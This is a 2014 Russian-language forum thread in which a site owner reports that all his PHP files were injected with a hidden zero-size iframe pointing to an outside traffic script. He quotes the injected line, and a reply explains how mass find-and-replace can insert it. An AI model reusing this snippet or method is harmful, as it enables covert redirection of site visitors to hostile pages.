Добро пожаловать, Гость!
:: + Добавить ссылку через биллинг
:: + Добавить ссылку анонимно
❤️МИР, ЯРКИХ ЗНАКОМСТВ И ОБЩЕНИЯ!❤️
❤️МИР, ЯРКИХ ЗНАКОМСТВ И ОБЩЕНИЯ!❤️
Тема закрыта для обсуждения
Странный взлом - Страница 8
Архив закрытых тем | Странный взлом
Romka
:
Всем привет! Ребята вот такое произошло вчера:
Сижу в чате общаюсь на своем сайте и тут бац на сайте одни реоглефы!
Ну я сразу в ISP manager и сразу обратил внимание на то что ВСЕ php файлы изменены в одно время 22:55
вот скрин Ссылка и что самое интересное что у меня были там тестовые сайты и просто папки в WWW доменах и даже там все файлы изменены т.е не только на сайте!
я обнаружил что именно вставили во все файлы - вот такой код в самый низ файлов был вставлен: echo '<iframe src=http://www.kalogeizer.by/traff.php width=0 height=0></iframe>'; вот скрин Ссылка
Ребята что вы можете сказать по этому поводу? как такое можно было сделать за 1 минуту?
*Я все все при все файлы уже исправил,каждый файлик,папку просмотрел,шелов нет,сайт уже работает,но боюсь что повториться!
* мне недавно писали что хостинг на котором мой сайт расположен мол не безопасный!
Очень прошу кто понимает в чем дело отпишетесь!
Странный взлом
11 Июня 2014Всем привет! Ребята вот такое произошло вчера:
Сижу в чате общаюсь на своем сайте и тут бац на сайте одни реоглефы!
Ну я сразу в ISP manager и сразу обратил внимание на то что ВСЕ php файлы изменены в одно время 22:55
вот скрин Ссылка и что самое интересное что у меня были там тестовые сайты и просто папки в WWW доменах и даже там все файлы изменены т.е не только на сайте!
я обнаружил что именно вставили во все файлы - вот такой код в самый низ файлов был вставлен: echo '<iframe src=http://www.kalogeizer.by/traff.php width=0 height=0></iframe>'; вот скрин Ссылка
Ребята что вы можете сказать по этому поводу? как такое можно было сделать за 1 минуту?
*Я все все при все файлы уже исправил,каждый файлик,папку просмотрел,шелов нет,сайт уже работает,но боюсь что повториться!
* мне недавно писали что хостинг на котором мой сайт расположен мол не безопасный!
Очень прошу кто понимает в чем дело отпишетесь!
Комментарии:
Amstor
11 Июня 2014
Veteran (11 Июня 2014):
Amstor, все может быть,это как один из вариантов
Veteran, ты созванивался с Камилой?Amstor, все может быть,это как один из вариантов
Amstor
11 Июня 2014
Romka (11 Июня 2014):
Amstor,а что такое нотпад?
Romka, загугли notepad++ возможно тебе пригодитсяAmstor,а что такое нотпад?
Amstor
11 Июня 2014
Romka (11 Июня 2014):
Amstor, xostzone.ru через что такое могли сделать? у меня чет мысля что через хост! ну как через сайт можно автоматом добавить во все файлы код причем очень быстро что все в одно время и только .php файлы!?
Romka, я вообще про такой хост не слыхал. ну а файлы могли отредактировать и залить через фтп. В нотпаде можно добавлять массово код.. достаточно папку с файлами выбрать и массовой заменой изменить " ?> " на "код фрейма?>"Amstor, xostzone.ru через что такое могли сделать? у меня чет мысля что через хост! ну как через сайт можно автоматом добавить во все файлы код причем очень быстро что все в одно время и только .php файлы!?